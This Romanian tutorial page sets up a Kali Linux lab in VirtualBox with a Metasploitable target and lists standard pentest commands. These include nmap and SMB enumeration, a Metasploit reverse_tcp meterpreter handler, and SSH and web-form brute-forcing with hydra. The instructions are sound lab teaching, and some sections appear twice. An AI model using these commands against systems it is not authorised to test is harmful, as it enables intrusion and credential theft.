Situatie
Kali Linux este distribuția Linux dedicată testelor de penetrare (pentest), dezvoltată și menținută de Offensive Security. Vine preinstalat cu peste 600 de unelte de securitate, organizate pe categorii: recunoaștere, scanare, exploatare, post-exploatare și raportare.
Solutie
Pasi de urmat
Cerințe Minime de Sistem
| Comandă | Descriere |
| RAM minim | 2 GB (recomandat 4 GB+) |
| Spațiu disc | 20 GB (recomandat 50 GB+) |
| CPU | x86-64 (AMD64), minim 2 nuclee |
| Rețea | Adaptor suportat de Linux (Wi-Fi optional) |
| VirtualBox | v7.1.x (compatibil Hyper-V/VBS pe Win 11) |
Mediu Recomandat (Setup PentestLab)
- Host: Windows 11 Enterprise + VirtualBox 7.1.6
- Guest: Kali Linux 2025.x (VM)
- IDE: VS Code + Continue.dev + Ollama (modele locale AI)
- Target: Metasploitable 2 (VM separată, izolată în rețea NAT)
- SSH: port forwarding host 2222 → guest 22
Instalare Kali Linux în VirtualBox
. Descărcare ISO
Descarcă imaginea oficială de pe:
https://www.kali.org/get-kali/#kali-virtual-machines
Recomandare: varianta VirtualBox (.ova) sau ISO installer 64-bit.
Configurare VirtualBox pentru Win 11 + Hyper-V
Atenție: pe Windows 11 cu VBS/Hyper-V activat, VirtualBox necesită setări speciale:
VBoxManage modifyvm “Kali-2025” –nested-hw-virt on
VBoxManage modifyvm “Kali-2025” –paravirt-provider hyper-v
Notă: Kaspersky/sau orice alta solutie antivirus poate bloca traficul NAT. Dezactivează temporar înainte de pornire VM.
Configurare Inițială Post-Instalare
. Actualizare Sistem
Prima comandă după boot – actualizează toate pachetele:
sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y && sudo apt autoclean
. Actualizare Sistem
Prima comandă după boot – actualizează toate pachetele:
sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y && sudo apt autoclean
Pe host Windows, adaugă port forwarding în VirtualBox: Host 2222 → Guest 22, apoi:
ssh kali@127.0.0.1 -p 2222
Configurare Utilizator și Sudo
sudo passwd root # setează parolă root
sudo usermod -aG sudo kali # confirmă sudo pentru userul curent
. Instalare Guest Additions VirtualBox
- Devices → Insert Guest Additions CD Image
- Deschide terminal:
sudo apt install -y build-essential linux-headers-$(uname -r)
sudo mount /dev/cdrom /mnt && sudo /mnt/VBoxLinuxAdditions.run
- Reboot VM – activează clipboard bidirectional și shared folders
Unelte Principale de Pentest
Recunoaștere și Scanare
| Comandă | Descriere |
| nmap | Scanner de porturi și servicii – esențial pentru enumerare |
| nmap -sV -sC -A <IP> | Scan complet cu detecție versiuni și scripturi NSE |
| nmap -p- <IP> | Scanare toate cele 65535 de porturi |
| netdiscover | Descoperire host-uri active în rețea locală |
| masscan | Scanner rapid de porturi (alternativă nmap la scară mare) |
| whois / dig / nslookup | Enumerare DNS și informații domeniu |
| theHarvester | Colectare emailuri, subdomenii din surse publice |
| maltego | Vizualizare grafică a relațiilor și informațiilor OSINT |
Enumerare Servicii
| Comandă | Descriere |
| enum4linux -a <IP> | Enumerare SMB/Samba (Windows shares, useri) |
| smbclient -L //<IP>/ | Listare share-uri SMB |
| rpcclient -U ” <IP> | Interacțiune RPC anonimă |
| nikto -h <IP> | Scanner vulnerabilități web |
| gobuster dir -u <URL> -w <wordlist> | Brute-force directoare web |
| dirb <URL> | Alternativă gobuster pentru web enumeration |
| wpscan –url <URL> | Scanner specific WordPress |
| sqlmap -u <URL> | Testare automată SQL Injection |
Exploatare – Metasploit Framework
msfconsole # pornire Metasploit
search <vulnerabilitate> # caută exploit
use exploit/multi/handler # handler pentru reverse shells
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP_Kali> set LPORT 4444
exploit # lansare atac
Fluxul tipic Metasploit:
- search – găsire modul potrivit
- use – selectare modul
- show options – vizualizare parametri necesari
- set <PARAM> <VALOARE> – configurare
- check – verificare vulnerabilitate (dacă e disponibil)
- run / exploit – lansare.
Exploatare – Metasploit Framework
msfconsole # pornire Metasploit
search <vulnerabilitate> # caută exploit
use exploit/multi/handler # handler pentru reverse shells
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP_Kali> set LPORT 4444
exploit # lansare atac
Fluxul tipic Metasploit:
- search – găsire modul potrivit
- use – selectare modul
- show options – vizualizare parametri necesari
- set <PARAM> <VALOARE> – configurare
- check – verificare vulnerabilitate (dacă e disponibil)
- run / exploit – lansare.
Cracking Parole
| Comandă | Descriere |
| john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt | John the Ripper cu wordlist |
| hashcat -m 0 hash.txt rockyou.txt | Hashcat – MD5 brute force |
| hydra -l admin -P pass.txt ssh://<IP> | Brute force SSH |
| hydra -l admin -P pass.txt http-post-form ‘…’ | Brute force web form |
| crunch 8 8 -t @@@@@@@@ | Generare wordlist personalizat |
Tip solutie
PermanentPlan de restaurare in caz de nefunctionare
Creare Mașină Virtuală
- Deschide VirtualBox → New
- Nume: Kali-2025 | Tip: Linux | Versiune: Debian 64-bit
- RAM: minim 4096 MB (recomandat 8192 MB)
- Disc: VDI dinamic, 50+ GB
- CPU: 2-4 nuclee | Activează PAE/NX
- Rețea: Adaptor 1 → NAT (Adaptor 2 → Host-Only pentru lab)
Leave A Comment?